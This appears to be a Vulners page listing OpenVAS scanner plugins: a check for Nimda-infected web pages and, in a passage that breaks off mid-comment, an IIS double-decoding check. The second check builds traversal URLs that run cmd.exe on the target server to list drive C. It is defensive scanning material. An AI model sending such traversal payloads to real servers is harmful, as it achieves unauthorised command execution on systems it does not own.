Search...

Tests for Nimda Worm infected HTML files

2005-11-03T00:00:00

ID OPENVAS:10767
Type openvas
Reporter This script is Copyright (C) 2001 Matt Moore
Modified 2017-12-07T00:00:00

Description

Your server appears to have been compromised by the Nimda mass mailing worm. It uses various known IIS vulnerabilities to compromise the server.

Anyone visiting compromised Web servers will be prompted to download an .eml (Outlook Express) email file, which contains the worm as an attachment.

Also, the worm will create open network shares on the infected computer, allowing access to the system. During this process the worm creates the guest account with Administrator privileges.

                                        
                                            # OpenVAS Vulnerability Test
# $Id: nimda.nasl 8023 2017-12-07 08:36:26Z teissa $
# Description: Tests for Nimda Worm infected HTML files
#
# Authors:
# Matt Moore &lt;matt.moore@westpoint.ltd.uk&gt;
# www.westpoint.ltd.uk
# June 4, 2002 Revision 1.9 Additional information and reference information
# added by Michael Scheidell SECNAP Network Security, LLC June 4, 2002
#
# Copyright:
# Copyright (C) 2001 Matt Moore
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License version 2,
# as published by the Free Software Foundation
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
#

tag_summary = "Your server appears to have been compromised by the 
Nimda mass mailing worm. It uses various known IIS 
vulnerabilities to compromise the server.

Anyone visiting compromised Web servers will be prompted to
download an .eml (Outlook Express) email file, which
contains the worm as an attachment. 

Also, the worm will create open network shares on the infected 
computer, allowing access to the system. During this process
the worm creates the guest account with Administrator privileges.";

tag_solution = "Take this server offline immediately, rebuild it and
apply ALL vendor patches and security updates before reconnecting
server to the internet, as well as security settings discussed in 
Additional Information section of Microsoft's web site at

http://www.microsoft.com/technet/security/bulletin/ms01-044.mspx

Check ALL of your local Microsoft based workstations for infection.
Note: this worm has already infected more than 500,000 computers
worldwide since its release in late 2001.

See:  http://www.cert.org/advisories/CA-2001-26.html";


if(description)
{
 script_id(10767);
 script_version("$Revision: 8023 $");
 script_cve_id("CVE-2001-0545", "CVE-2001-0508", "CVE-2001-0544", "CVE-2001-0506",
               "CVE-2001-0507");
 script_tag(name:"last_modification", value:"$Date: 2017-12-07 09:36:26 +0100 (Thu, 07 Dec 2017) $");
 script_tag(name:"creation_date", value:"2005-11-03 14:08:04 +0100 (Thu, 03 Nov 2005)");
 script_tag(name:"cvss_base", value:"7.2");
 script_tag(name:"cvss_base_vector", value:"AV:L/AC:L/Au:N/C:C/I:C/A:C");
 name = "Tests for Nimda Worm infected HTML files";
 script_name(name);
 script_category(ACT_GATHER_INFO);
  script_tag(name:"qod_type", value:"remote_analysis");
 script_copyright("This script is Copyright (C) 2001 Matt Moore");
 family = "Web application abuses";
 script_family(family);
 script_dependencies("find_service.nasl", "no404.nasl");
 script_require_ports("Services/www", 80);
 script_exclude_keys("Settings/disable_cgi_scanning");
 script_tag(name : "solution" , value : tag_solution);
 script_tag(name : "summary" , value : tag_summary);
 exit(0);
}

# Check for references to readme.eml in default HTML page..

include("http_func.inc");
include("http_keepalive.inc");

port = get_http_port(default:80);
 r = http_get_cache(item:"/", port:port);
 if(r && "readme.eml" &gt;&lt; r)	
 	security_message(port);

JSON Vulners Source

Initial Source

{"href": "http://plugins.openvas.org/nasl.php?oid=10767", "history": [{"lastseen": "2017-07-02T21:10:05", "differentElements": ["modified", "sourceData"], "edition": 1, "bulletin": {"href": "http://plugins.openvas.org/nasl.php?oid=10767", "history": [], "naslFamily": "Web application abuses", "id": "OPENVAS:10767", "title": "Tests for Nimda Worm infected HTML files", "description": "Your server appears to have been compromised by the \nNimda mass mailing worm. It uses various known IIS \nvulnerabilities to compromise the server.\n\nAnyone visiting compromised Web servers will be prompted to\ndownload an .eml (Outlook Express) email file, which\ncontains the worm as an attachment. \n\nAlso, the worm will create open network shares on the infected \ncomputer, allowing access to the system. During this process\nthe worm creates the guest account with Administrator privileges.", "published": "2005-11-03T00:00:00", "type": "openvas", "bulletinFamily": "scanner", "hashmap": [{"key": "modified", "hash": "ba7ca754b44869dae389b89ab1086045"}, {"key": "cvss", "hash": "cfd16da9581e0c21db590e40dfd9e493"}, {"key": "references", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "sourceData", "hash": "1cfd1fae32c2b20127f4e6f1140092d2"}, {"key": "description", "hash": "8cb45658e2460ce77a2c7cc7c3b71f4c"}, {"key": "href", "hash": "e490483f983e56fc03e28bdbf24ea0e7"}, {"key": "published", "hash": "df034d9b90ece22f6e868d36506db720"}, {"key": "naslFamily", "hash": "55199d25018fbdb9b50e6b64d444c3a4"}, {"key": "type", "hash": "47c1f692ea47a21f716dad07043ade01"}, {"key": "bulletinFamily", "hash": "bbdaea376f500d25f6b0c1050311dd07"}, {"key": "pluginID", "hash": "3f7f7794da20d537bf1da2e615ce82e5"}, {"key": "cvelist", "hash": "093e5be2588b04d2a21b1f154eaa35f7"}, {"key": "reporter", "hash": "497cc115beb834306b8dc6ad7fb31d08"}, {"key": "title", "hash": "8e3bcaa82e13fe58777dfc981563e6ef"}], "sourceData": "# OpenVAS Vulnerability Test\n# $Id: nimda.nasl 6046 2017-04-28 09:02:54Z teissa $\n# Description: Tests for Nimda Worm infected HTML files\n#\n# Authors:\n# Matt Moore <matt.moore@westpoint.ltd.uk>\n# www.westpoint.ltd.uk\n# June 4, 2002 Revision 1.9 Additional information and reference information\n# added by Michael Scheidell SECNAP Network Security, LLC June 4, 2002\n#\n# Copyright:\n# Copyright (C) 2001 Matt Moore\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ntag_summary = \"Your server appears to have been compromised by the \nNimda mass mailing worm. It uses various known IIS \nvulnerabilities to compromise the server.\n\nAnyone visiting compromised Web servers will be prompted to\ndownload an .eml (Outlook Express) email file, which\ncontains the worm as an attachment. \n\nAlso, the worm will create open network shares on the infected \ncomputer, allowing access to the system. During this process\nthe worm creates the guest account with Administrator privileges.\";\n\ntag_solution = \"Take this server offline immediately, rebuild it and\napply ALL vendor patches and security updates before reconnecting\nserver to the internet, as well as security settings discussed in \nAdditional Information section of Microsoft's web site at\n\nhttp://www.microsoft.com/technet/security/bulletin/ms01-044.mspx\n\nCheck ALL of your local Microsoft based workstations for infection.\nNote: this worm has already infected more than 500,000 computers\nworldwide since its release in late 2001.\n\nSee: http://www.cert.org/advisories/CA-2001-26.html\";\n\n\nif(description)\n{\n script_id(10767);\n script_version(\"$Revision: 6046 $\");\n script_cve_id(\"CVE-2001-0545\", \"CVE-2001-0508\", \"CVE-2001-0544\", \"CVE-2001-0506\",\n \"CVE-2001-0507\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-04-28 11:02:54 +0200 (Fri, 28 Apr 2017) $\");\n script_tag(name:\"creation_date\", value:\"2005-11-03 14:08:04 +0100 (Thu, 03 Nov 2005)\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n name = \"Tests for Nimda Worm infected HTML files\";\n script_name(name);\n \n\n summary = \"Tests for Nimda Worm infected HTML files\";\n script_category(ACT_GATHER_INFO);\n script_tag(name:\"qod_type\", value:\"remote_analysis\");\n script_copyright(\"This script is Copyright (C) 2001 Matt Moore\");\n family = \"Web application abuses\";\n script_family(family);\n script_dependencies(\"find_service.nasl\", \"no404.nasl\");\n script_require_ports(\"Services/www\", 80);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n exit(0);\n}\n\n# Check for references to readme.eml in default HTML page..\n\ninclude(\"http_func.inc\");\ninclude(\"http_keepalive.inc\");\n\nport = get_http_port(default:80);\n\nif(get_port_state(port))\n{ \n r = http_get_cache(item:\"/\", port:port);\n if(r && \"readme.eml\" >< r)\t\n \tsecurity_message(port);\n}\n", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "pluginID": "10767", "hash": "3ea4baf24a4d7d49e198dead758e5d3abdbde65edd287746f47e4cdbb17bcf9d", "modified": "2017-04-28T00:00:00", "edition": 1, "cvelist": ["CVE-2001-0506", "CVE-2001-0544", "CVE-2001-0507", "CVE-2001-0545", "CVE-2001-0508"], "lastseen": "2017-07-02T21:10:05", "viewCount": 0, "enchantments": {}, "reporter": "This script is Copyright (C) 2001 Matt Moore", "objectVersion": "1.3", "references": []}}, {"lastseen": "2017-07-27T10:49:38", "differentElements": ["modified", "sourceData"], "edition": 2, "bulletin": {"href": "http://plugins.openvas.org/nasl.php?oid=10767", "history": [], "naslFamily": "Web application abuses", "id": "OPENVAS:10767", "title": "Tests for Nimda Worm infected HTML files", "description": "Your server appears to have been compromised by the \nNimda mass mailing worm. It uses various known IIS \nvulnerabilities to compromise the server.\n\nAnyone visiting compromised Web servers will be prompted to\ndownload an .eml (Outlook Express) email file, which\ncontains the worm as an attachment. \n\nAlso, the worm will create open network shares on the infected \ncomputer, allowing access to the system. During this process\nthe worm creates the guest account with Administrator privileges.", "published": "2005-11-03T00:00:00", "type": "openvas", "bulletinFamily": "scanner", "hashmap": [{"key": "cvss", "hash": "cfd16da9581e0c21db590e40dfd9e493"}, {"key": "references", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "modified", "hash": "602bced6320cec4ab33d131e0b746b65"}, {"key": "description", "hash": "8cb45658e2460ce77a2c7cc7c3b71f4c"}, {"key": "href", "hash": "e490483f983e56fc03e28bdbf24ea0e7"}, {"key": "published", "hash": "df034d9b90ece22f6e868d36506db720"}, {"key": "naslFamily", "hash": "55199d25018fbdb9b50e6b64d444c3a4"}, {"key": "type", "hash": "47c1f692ea47a21f716dad07043ade01"}, {"key": "bulletinFamily", "hash": "bbdaea376f500d25f6b0c1050311dd07"}, {"key": "pluginID", "hash": "3f7f7794da20d537bf1da2e615ce82e5"}, {"key": "cvelist", "hash": "093e5be2588b04d2a21b1f154eaa35f7"}, {"key": "reporter", "hash": "497cc115beb834306b8dc6ad7fb31d08"}, {"key": "sourceData", "hash": "8969280bd67b65476b529d5d03b09150"}, {"key": "title", "hash": "8e3bcaa82e13fe58777dfc981563e6ef"}], "sourceData": "# OpenVAS Vulnerability Test\n# $Id: nimda.nasl 6702 2017-07-12 13:49:41Z cfischer $\n# Description: Tests for Nimda Worm infected HTML files\n#\n# Authors:\n# Matt Moore <matt.moore@westpoint.ltd.uk>\n# www.westpoint.ltd.uk\n# June 4, 2002 Revision 1.9 Additional information and reference information\n# added by Michael Scheidell SECNAP Network Security, LLC June 4, 2002\n#\n# Copyright:\n# Copyright (C) 2001 Matt Moore\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ntag_summary = \"Your server appears to have been compromised by the \nNimda mass mailing worm. It uses various known IIS \nvulnerabilities to compromise the server.\n\nAnyone visiting compromised Web servers will be prompted to\ndownload an .eml (Outlook Express) email file, which\ncontains the worm as an attachment. \n\nAlso, the worm will create open network shares on the infected \ncomputer, allowing access to the system. During this process\nthe worm creates the guest account with Administrator privileges.\";\n\ntag_solution = \"Take this server offline immediately, rebuild it and\napply ALL vendor patches and security updates before reconnecting\nserver to the internet, as well as security settings discussed in \nAdditional Information section of Microsoft's web site at\n\nhttp://www.microsoft.com/technet/security/bulletin/ms01-044.mspx\n\nCheck ALL of your local Microsoft based workstations for infection.\nNote: this worm has already infected more than 500,000 computers\nworldwide since its release in late 2001.\n\nSee: http://www.cert.org/advisories/CA-2001-26.html\";\n\n\nif(description)\n{\n script_id(10767);\n script_version(\"$Revision: 6702 $\");\n script_cve_id(\"CVE-2001-0545\", \"CVE-2001-0508\", \"CVE-2001-0544\", \"CVE-2001-0506\",\n \"CVE-2001-0507\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-12 15:49:41 +0200 (Wed, 12 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2005-11-03 14:08:04 +0100 (Thu, 03 Nov 2005)\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n name = \"Tests for Nimda Worm infected HTML files\";\n script_name(name);\n summary = \"Tests for Nimda Worm infected HTML files\";\n script_category(ACT_GATHER_INFO);\n script_tag(name:\"qod_type\", value:\"remote_analysis\");\n script_copyright(\"This script is Copyright (C) 2001 Matt Moore\");\n family = \"Web application abuses\";\n script_family(family);\n script_dependencies(\"find_service.nasl\", \"no404.nasl\");\n script_require_ports(\"Services/www\", 80);\n script_exclude_keys(\"Settings/disable_cgi_scanning\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n exit(0);\n}\n\n# Check for references to readme.eml in default HTML page..\n\ninclude(\"http_func.inc\");\ninclude(\"http_keepalive.inc\");\n\nport = get_http_port(default:80);\n r = http_get_cache(item:\"/\", port:port);\n if(r && \"readme.eml\" >< r)\t\n \tsecurity_message(port);\n", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "pluginID": "10767", "hash": "fff8eceb76649ae06e8df5e4ab66cb552763b498054e8de7bceb73fad8cb1e49", "modified": "2017-07-12T00:00:00", "edition": 2, "cvelist": ["CVE-2001-0506", "CVE-2001-0544", "CVE-2001-0507", "CVE-2001-0545", "CVE-2001-0508"], "lastseen": "2017-07-27T10:49:38", "viewCount": 0, "enchantments": {}, "reporter": "This script is Copyright (C) 2001 Matt Moore", "objectVersion": "1.3", "references": []}}], "naslFamily": "Web application abuses", "id": "OPENVAS:10767", "reporter": "This script is Copyright (C) 2001 Matt Moore", "published": "2005-11-03T00:00:00", "description": "Your server appears to have been compromised by the \nNimda mass mailing worm. It uses various known IIS \nvulnerabilities to compromise the server.\n\nAnyone visiting compromised Web servers will be prompted to\ndownload an .eml (Outlook Express) email file, which\ncontains the worm as an attachment. \n\nAlso, the worm will create open network shares on the infected \ncomputer, allowing access to the system. During this process\nthe worm creates the guest account with Administrator privileges.", "title": "Tests for Nimda Worm infected HTML files", "bulletinFamily": "scanner", "type": "openvas", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: nimda.nasl 8023 2017-12-07 08:36:26Z teissa $\n# Description: Tests for Nimda Worm infected HTML files\n#\n# Authors:\n# Matt Moore <matt.moore@westpoint.ltd.uk>\n# www.westpoint.ltd.uk\n# June 4, 2002 Revision 1.9 Additional information and reference information\n# added by Michael Scheidell SECNAP Network Security, LLC June 4, 2002\n#\n# Copyright:\n# Copyright (C) 2001 Matt Moore\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ntag_summary = \"Your server appears to have been compromised by the \nNimda mass mailing worm. It uses various known IIS \nvulnerabilities to compromise the server.\n\nAnyone visiting compromised Web servers will be prompted to\ndownload an .eml (Outlook Express) email file, which\ncontains the worm as an attachment. \n\nAlso, the worm will create open network shares on the infected \ncomputer, allowing access to the system. During this process\nthe worm creates the guest account with Administrator privileges.\";\n\ntag_solution = \"Take this server offline immediately, rebuild it and\napply ALL vendor patches and security updates before reconnecting\nserver to the internet, as well as security settings discussed in \nAdditional Information section of Microsoft's web site at\n\nhttp://www.microsoft.com/technet/security/bulletin/ms01-044.mspx\n\nCheck ALL of your local Microsoft based workstations for infection.\nNote: this worm has already infected more than 500,000 computers\nworldwide since its release in late 2001.\n\nSee: http://www.cert.org/advisories/CA-2001-26.html\";\n\n\nif(description)\n{\n script_id(10767);\n script_version(\"$Revision: 8023 $\");\n script_cve_id(\"CVE-2001-0545\", \"CVE-2001-0508\", \"CVE-2001-0544\", \"CVE-2001-0506\",\n \"CVE-2001-0507\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-12-07 09:36:26 +0100 (Thu, 07 Dec 2017) $\");\n script_tag(name:\"creation_date\", value:\"2005-11-03 14:08:04 +0100 (Thu, 03 Nov 2005)\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n name = \"Tests for Nimda Worm infected HTML files\";\n script_name(name);\n script_category(ACT_GATHER_INFO);\n script_tag(name:\"qod_type\", value:\"remote_analysis\");\n script_copyright(\"This script is Copyright (C) 2001 Matt Moore\");\n family = \"Web application abuses\";\n script_family(family);\n script_dependencies(\"find_service.nasl\", \"no404.nasl\");\n script_require_ports(\"Services/www\", 80);\n script_exclude_keys(\"Settings/disable_cgi_scanning\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n exit(0);\n}\n\n# Check for references to readme.eml in default HTML page..\n\ninclude(\"http_func.inc\");\ninclude(\"http_keepalive.inc\");\n\nport = get_http_port(default:80);\n r = http_get_cache(item:\"/\", port:port);\n if(r && \"readme.eml\" >< r)\t\n \tsecurity_message(port);\n", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "pluginID": "10767", "hash": "28831c7ee2b425fb9158575e514cb3290293854c8cefcbb59cf7a9d73bb03484", "references": [], "edition": 3, "cvelist": ["CVE-2001-0506", "CVE-2001-0544", "CVE-2001-0507", "CVE-2001-0545", "CVE-2001-0508"], "lastseen": "2017-12-08T11:44:04", "viewCount": 5, "enchantments": {"score": {"value": 6.5, "vector": "NONE", "modified": "2017-12-08T11:44:04"}, "dependencies": {"references": [{"type": "openvas", "idList": ["OPENVAS:136141256231010767", "OPENVAS:136141256231010671", "OPENVAS:10671"]}, {"type": "cve", "idList": ["CVE-2001-0506", "CVE-2001-0508", "CVE-2001-0545", "CVE-2001-0507", "CVE-2001-0544"]}, {"type": "nessus", "idList": ["IIS_ISAPI_OVERFLOW.NASL", "IIS_DECODE_BUG.NASL"]}, {"type": "osvdb", "idList": ["OSVDB:5736", "OSVDB:5670", "OSVDB:5606", "OSVDB:5633", "OSVDB:5584", "OSVDB:1930", "OSVDB:1931"]}, {"type": "exploitdb", "idList": ["EDB-ID:21072", "EDB-ID:21071"]}, {"type": "seebug", "idList": ["SSV:3636"]}, {"type": "cert", "idList": ["VU:959211", "VU:630531"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:1940"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:25189"]}], "modified": "2017-12-08T11:44:04"}, "vulnersScore": 6.5}, "hashmap": [{"key": "bulletinFamily", "hash": "bbdaea376f500d25f6b0c1050311dd07"}, {"key": "cvelist", "hash": "093e5be2588b04d2a21b1f154eaa35f7"}, {"key": "cvss", "hash": "cfd16da9581e0c21db590e40dfd9e493"}, {"key": "description", "hash": "8cb45658e2460ce77a2c7cc7c3b71f4c"}, {"key": "href", "hash": "e490483f983e56fc03e28bdbf24ea0e7"}, {"key": "modified", "hash": "c2a5d507aa397befb5850df450bea65f"}, {"key": "naslFamily", "hash": "55199d25018fbdb9b50e6b64d444c3a4"}, {"key": "pluginID", "hash": "3f7f7794da20d537bf1da2e615ce82e5"}, {"key": "published", "hash": "df034d9b90ece22f6e868d36506db720"}, {"key": "references", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "reporter", "hash": "497cc115beb834306b8dc6ad7fb31d08"}, {"key": "sourceData", "hash": "2bd710acde4175c8b6f9a93031c20729"}, {"key": "title", "hash": "8e3bcaa82e13fe58777dfc981563e6ef"}, {"key": "type", "hash": "47c1f692ea47a21f716dad07043ade01"}], "objectVersion": "1.3", "modified": "2017-12-07T00:00:00"}

{"openvas": [{"lastseen": "2020-01-08T12:24:19", "bulletinFamily": "scanner", "description": "Your server appears to have been compromised by the\n Nimda mass mailing worm. It uses various known IIS vulnerabilities to compromise the\n server.", "modified": "2020-01-07T00:00:00", "published": "2005-11-03T00:00:00", "id": "OPENVAS:136141256231010767", "href": "http://plugins.openvas.org/nasl.php?oid=136141256231010767", "title": "Tests for Nimda Worm infected HTML files", "type": "openvas", "sourceData": "# OpenVAS Vulnerability Test\n# Description: Tests for Nimda Worm infected HTML files\n#\n# Authors:\n# Matt Moore <matt.moore@westpoint.ltd.uk>\n# www.westpoint.ltd.uk\n# June 4, 2002 Revision 1.9 Additional information and reference information\n# added by Michael Scheidell SECNAP Network Security, LLC June 4, 2002\n#\n# Copyright:\n# Copyright (C) 2001 Matt Moore\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.10767\");\n script_version(\"2020-01-07T09:06:32+0000\");\n script_cve_id(\"CVE-2001-0545\", \"CVE-2001-0508\", \"CVE-2001-0544\", \"CVE-2001-0506\", \"CVE-2001-0507\");\n script_tag(name:\"last_modification\", value:\"2020-01-07 09:06:32 +0000 (Tue, 07 Jan 2020)\");\n script_tag(name:\"creation_date\", value:\"2005-11-03 14:08:04 +0100 (Thu, 03 Nov 2005)\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"Tests for Nimda Worm infected HTML files\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"This script is Copyright (C) 2001 Matt Moore\");\n script_family(\"Malware\");\n script_dependencies(\"find_service.nasl\", \"http_version.nasl\", \"global_settings.nasl\");\n script_require_ports(\"Services/www\", 80);\n script_exclude_keys(\"Settings/disable_cgi_scanning\");\n\n script_xref(name:\"URL\", value:\"https://docs.microsoft.com/en-us/security-updates/securitybulletins/2001/ms01-044\");\n script_xref(name:\"URL\", value:\"http://www.cert.org/advisories/CA-2001-26.html\");\n\n script_tag(name:\"solution\", value:\"Take this server offline immediately, rebuild it and\n apply ALL vendor patches and security updates before reconnecting server to the internet,\n as well as security settings discussed in\n\n Additional Information section of Microsoft's web site linked in the references.\n\n Check ALL of your local Microsoft based workstations for infection.\");\n\n script_tag(name:\"summary\", value:\"Your server appears to have been compromised by the\n Nimda mass mailing worm. It uses various known IIS vulnerabilities to compromise the\n server.\");\n\n script_tag(name:\"insight\", value:\"Anyone visiting compromised Web servers will be prompted to\n download an .eml (Outlook Express) email file, which contains the worm as an attachment.\n\n Also, the worm will create open network shares on the infected\n computer, allowing access to the system. During this process\n the worm creates the guest account with Administrator privileges.\n\n Note: this worm has already infected more than 500.000 computers\n worldwide since its release in late 2001.\");\n\n script_tag(name:\"solution_type\", value:\"Mitigation\");\n script_tag(name:\"qod_type\", value:\"remote_probe\");\n\n exit(0);\n}\n\ninclude(\"http_func.inc\");\ninclude(\"http_keepalive.inc\");\n\nport = get_http_port(default:80);\nr = http_get_cache(item:\"/\", port:port);\nif(r && \"readme.eml\" >< r) {\n security_message(port:port);\n exit(0);\n}\n\nexit(99);\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2017-12-08T11:44:13", "bulletinFamily": "scanner", "description": "When IIS receives a user request to run a script, it renders\nthe request in a decoded canonical form, then performs\nsecurity checks on the decoded request. A vulnerability\nresults because a second, superfluous decoding pass is\nperformed after the initial security checks are completed.\nThus, a specially crafted request could allow an attacker to\nexecute arbitrary commands on the IIS Server.", "modified": "2017-12-07T00:00:00", "published": "2005-11-03T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=10671", "id": "OPENVAS:10671", "title": "IIS Remote Command Execution", "type": "openvas", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: iis_decode_bug.nasl 8023 2017-12-07 08:36:26Z teissa $\n# Description: IIS Remote Command Execution\n#\n# Authors:\n# Matt Moore (matt@westpoint.ltd.uk)\n# derived from the NASL script to test for the UNICODE directory traversal \n# vulnerability, originally written by Renaud Deraison.\n# Then Renaud took Matt's script and used H D Moore modifications\n# to iis_dir_traversal.nasl ;)\n#\n# Copyright:\n# Copyright (C) 2001 Matt Moore / H D Moore\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ntag_summary = \"When IIS receives a user request to run a script, it renders\nthe request in a decoded canonical form, then performs\nsecurity checks on the decoded request. A vulnerability\nresults because a second, superfluous decoding pass is\nperformed after the initial security checks are completed.\nThus, a specially crafted request could allow an attacker to\nexecute arbitrary commands on the IIS Server.\";\n\ntag_solution = \"See MS advisory MS01-026(Superseded by ms01-044)\nSee http://www.microsoft.com/technet/security/bulletin/ms01-044.mspx\";\n\nif(description)\n{\n script_id(10671);\n script_version(\"$Revision: 8023 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-12-07 09:36:26 +0100 (Thu, 07 Dec 2017) $\");\n script_tag(name:\"creation_date\", value:\"2005-11-03 14:08:04 +0100 (Thu, 03 Nov 2005)\");\n script_xref(name:\"IAVA\", value:\"2001-a-0006\");\n script_bugtraq_id(2708, 3193);\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_cve_id(\"CVE-2001-0507\", \"CVE-2001-0333\");\n\n name = \"IIS Remote Command Execution\";\n script_name(name);\n \n \n script_category(ACT_GATHER_INFO);\n script_tag(name:\"qod_type\", value:\"remote_vul\");\n script_copyright(\"This script is Copyright (C) 2001 Matt Moore / H D Moore\");\n family = \"Web Servers\";\n script_family(family);\n script_dependencies(\"gb_get_http_banner.nasl\");\n script_mandatory_keys(\"IIS/banner\");\n script_require_ports(\"Services/www\", 80);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n exit(0);\n}\n\ninclude(\"http_func.inc\");\ninclude(\"http_keepalive.inc\");\n\nport = get_http_port(default:80);\n\nbanner = get_http_banner(port:port);\nif ( \"Microsoft/IIS\" >!< banner ) exit(0);\n\nif(!get_port_state(port))exit(0);\n\n\ndir[0] = \"/scripts/\";\ndir[1] = \"/msadc/\";\ndir[2] = \"/iisadmpwd/\";\ndir[3] = \"/_vti_bin/\";\t\t# FP\ndir[4] = \"/_mem_bin/\";\t\t# FP\ndir[5] = \"/exchange/\";\t\t# OWA\ndir[6] = \"/pbserver/\";\t\t# Win2K\ndir[7] = \"/rpc/\";\t\t# Win2K\ndir[8] = \"/cgi-bin/\";\ndir[9] = \"/\";\n\nuni[0] = \"%255c\"; \tdots[0] = \"..\";\nuni[1] = \"%%35c\";\tdots[1] = \"..\";\nuni[2] = \"%%35%63\";\tdots[2] = \"..\";\nuni[3] = \"%25%35%63\"; dots[3] = \"..\";\nuni[4] = \"%252e\";\tdots[4] = \"/.\";\n\n\n\n\nfunction check(req)\n{\n r = http_keepalive_send_recv(port:port, data:http_get(item:req, port:port));\n if(r == NULL)\n { \n exit(0);\n }\n\n pat = \"<DIR>\";\n pat2 = \"Directory of C\";\n\n if((pat >< r) || (pat2 >< r)){\n \tsecurity_message(port:port);\n\treturn(1);\n \t}\n return(0);\n}\n\n\ncmd = \"/winnt/system32/cmd.exe?/c+dir+c:\\\\+/OG\";\nfor(d=0;dir[d];d=d+1)\n{\n\tfor(i=0;uni[i];i=i+1)\n\t{\n\t\turl = string(dir[d], dots[i], uni[i], dots[i], uni[i], dots[i], uni[i], dots[i], uni[i], dots[i], uni[i], dots[i], cmd);\n\t\tif(check(req:url))exit(0);\n\t}\n}\n\n\n# Slight variation- do the same, but don't put dots[i] in front\n# of cmd (reported on 